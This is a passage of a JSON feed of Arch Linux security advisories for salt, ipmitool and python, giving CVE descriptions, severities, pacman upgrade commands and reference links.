3002.5.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2020-28243 (privilege escalation)\n\nAn issue was discovered in SaltStack Salt before 3002.5. The minion's\nrestartcheck is vulnerable to command injection via a crafted process\nname. This allows for a local privilege escalation by any user able to\ncreate a files on the minion in a non-blacklisted directory.\n\n- CVE-2020-28972 (certificate verification bypass)\n\nIn SaltStack Salt before 3002.5, authentication to VMware vcenter,\nvsphere, and esxi servers (in the vmware.py files) does not always\nvalidate the SSL/TLS certificate.\n\n- CVE-2020-35662 (certificate verification bypass)\n\nIn SaltStack Salt before 3002.5, when authenticating to services using\ncertain modules, the SSL certificate is not always validated.\n\n- CVE-2021-3144 (insufficient validation)\n\nIn SaltStack Salt before 3002.5, eauth tokens can be used once after\nexpiration. (They might be used to run command against the salt master\nor minions.)\n\n- CVE-2021-3148 (arbitrary command execution)\n\nAn issue was discovered in SaltStack Salt before 3002.5. Sending\ncrafted web requests to the Salt API can result in\nsalt.utils.thin.gen_thin() command injection because of different\nhandling of single versus double quotes. This is related to\nsalt/utils/thin.py.\n\n- CVE-2021-3197 (arbitrary command execution)\n\nAn issue was discovered in SaltStack Salt before 3002.5. The salt-api's\nssh client is vulnerable to a shell injection by including ProxyCommand\nin an argument, or via ssh_options provided in an API request.\n\n- CVE-2021-25281 (access restriction bypass)\n\nAn issue was discovered in SaltStack Salt before 3002.5. salt-api does\nnot honor eauth credentials for the wheel_async client. Thus, an\nattacker can remotely run any wheel modules on the master.\n\n- CVE-2021-25282 (directory traversal)\n\nAn issue was discovered in SaltStack Salt before 3002.5. The\nsalt.wheel.pillar_roots.write method is vulnerable to directory\ntraversal.\n\n- CVE-2021-25283 (cross-site scripting)\n\nAn issue was discovered in SaltStack Salt before 3002.5. The jinja\nrenderer does not protect against server side template injection\nattacks.\n\n- CVE-2021-25284 (information disclosure)\n\nAn issue was discovered in SaltStack Salt before 3002.5.\nsalt.modules.cmdmod can log credentials to the info or error log level.\n\nImpact\n======\n\n\n\nReferences\n==========\n\nhttps://saltproject.io/security_announcements/active-saltstack-cve-release-2021-feb-25/\nhttps://security.archlinux.org/CVE-2020-28243\nhttps://security.archlinux.org/CVE-2020-28972\nhttps://security.archlinux.org/CVE-2020-35662\nhttps://security.archlinux.org/CVE-2021-3144\nhttps://security.archlinux.org/CVE-2021-3148\nhttps://security.archlinux.org/CVE-2021-3197\nhttps://security.archlinux.org/CVE-2021-25281\nhttps://security.archlinux.org/CVE-2021-25282\nhttps://security.archlinux.org/CVE-2021-25283\nhttps://security.archlinux.org/CVE-2021-25284\n", "modified": "2021-02-27T00:00:00", "published": "2021-02-27T00:00:00", "id": "ASA-202102-33", "href": "https://security.archlinux.org/ASA-202102-33", "type": "archlinux", "title": "[ASA-202102-33] salt: multiple issues", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-27T14:37:10", "bulletinFamily": "unix", "cvelist": ["CVE-2020-5208"], "description": "Arch Linux Security Advisory ASA-202102-39\n==========================================\n\nSeverity: High\nDate : 2021-02-27\nCVE-ID : CVE-2020-5208\nPackage : ipmitool\nType : arbitrary code execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1596\n\nSummary\n=======\n\nThe package ipmitool before version 1.8.18-7 is vulnerable to arbitrary\ncode execution.\n\nResolution\n==========\n\nUpgrade to 1.8.18-7.\n\n# pacman -Syu \"ipmitool>=1.8.18-7\"\n\nThe problem has been fixed upstream but no release is available yet.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nIt's been found that multiple functions in ipmitool before 1.8.19\nneglect proper checking of the data received from a remote LAN party,\nwhich may lead to buffer overflows and potentially to remote code\nexecution on the ipmitool side. This is especially dangerous if\nipmitool is run as a privileged user. This problem is fixed in version\n1.8.19.\n\nImpact\n======\n\n\n\nReferences\n==========\n\nhttps://bugs.archlinux.org/task/69708\nhttps://github.com/ipmitool/ipmitool/security/advisories/GHSA-g659-9qxw-p7cp\nhttps://github.com/ipmitool/ipmitool/commit/e824c23316ae50beb7f7488f2055ac65e8b341f2\nhttps://github.com/ipmitool/ipmitool/commit/840fb1cbb4fb365cb9797300e3374d4faefcdb10\nhttps://github.com/ipmitool/ipmitool/commit/41d7026946fafbd4d1ec0bcaca3ea30a6e8eed22\nhttps://github.com/ipmitool/ipmitool/commit/9452be87181a6e83cfcc768b3ed8321763db50e4\nhttps://github.com/ipmitool/ipmitool/commit/d45572d71e70840e0d4c50bf48218492b79c1a10\nhttps://github.com/ipmitool/ipmitool/commit/7ccea283dd62a05a320c1921e3d8d71a87772637\nhttps://security.archlinux.org/CVE-2020-5208\n", "modified": "2021-02-27T00:00:00", "published": "2021-02-27T00:00:00", "id": "ASA-202102-39", "href": "https://security.archlinux.org/ASA-202102-39", "type": "archlinux", "title": "[ASA-202102-39] ipmitool: arbitrary code execution", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-02-27T14:37:10", "bulletinFamily": "unix", "cvelist": ["CVE-2021-23336", "CVE-2021-3177"], "description": "Arch Linux Security Advisory ASA-202102-37\n==========================================\n\nSeverity: Medium\nDate : 2021-02-27\nCVE-ID : CVE-2021-3177 CVE-2021-23336\nPackage : python\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1465\n\nSummary\n=======\n\nThe package python before version 3.9.2-1 is vulnerable to multiple\nissues including arbitrary code execution and url request injection.\n\nResolution\n==========\n\nUpgrade to 3.9.2-1.\n\n# pacman -Syu \"python>=3.9.2-1\"\n\nThe problems have been fixed upstream in version 3.9.2.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2021-3177 (arbitrary code execution)\n\nPython 3.x through 3.9.1 has a buffer overflow in PyCArg_repr in\n_ctypes/callproc.c, which may lead to remote code execution in certain\nPython applications that accept floating-point numbers as untrusted\ninput, as demonstrated by a 1e300 argument to c_double.from_param. This\noccurs because sprintf is used unsafely.\n\n- CVE-2021-23336 (url request injection)\n\nThe package python/cpython from 0 and before 3.6.13, from 3.7.0 and\nbefore 3.7.10, from 3.8.0 and before 3.8.8, from 3.9.0 and before 3.9.2\nare vulnerable to Web Cache Poisoning via urllib.parse.parse_qsl and\nurllib.parse.parse_qs by using a vector called parameter cloaking. When\nthe attacker can separate query parameters using a semicolon (;), they\ncan cause a difference in the interpretation of the request between the\nproxy (running with default configuration) and the server. This can\nresult in malicious requests being cached as completely safe ones, as\nthe proxy would usually not see the semicolon as a separator, and\ntherefore would not include it in a cache key of an unkeyed parameter.\n\nThe package python-django contains a copy of urllib.parse.parse_qsl()\nwhich was added to backport some security fixes. A further security fix\nhas been issued in versions 3.1.7, 3.0.13 and 2.2.19 such that\nparse_qsl() no longer allows using ; as a query parameter separator by\ndefault.\n\nImpact\n======\n\n\n\nReferences\n==========\n\nhttps://python-security.readthedocs.io/vuln/ctypes-buffer-overflow-pycarg_repr.html\nhttps://bugs.python.org/issue42938\nhttps://github.com/python/cpython/pull/24239\nhttps://github.com/python/cpython/commit/c347cbe694743cee120457aa6626712f7799a932\nhttps://snyk.io/vuln/SNYK-UPSTREAM-PYTHONCPYTHON-1074933\nhttps://snyk.io/blog/cache-poisoning-in-popular-open-source-packages/\nhttps://bugs.python.org/issue42967\nhttps://github.com/python/cpython/pull/24297\nhttps://github.com/python/cpython/commit/c9f07813ab8e664d8c34413c4fc2d4f86c061a92\nhttps://www.djangoproject.com/weblog/2021/feb/19/security-releases/\nhttps://github.com/django/django/commit/8f6d431b08cbb418d9144b976e7b972546607851\nhttps://security.archlinux.org/CVE-2021-3177\nhttps://security.archlinux.org/CVE-2021-23336\n", "modified": "2021-02-27T00:00:00", "published": "2021-02-27T00:00:00", "id": "ASA-202102-37", "href": "https://security.archlinux.org/ASA-202102-37", "type": "archlinux", "title": "[ASA-202102-37] python: multiple issues", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}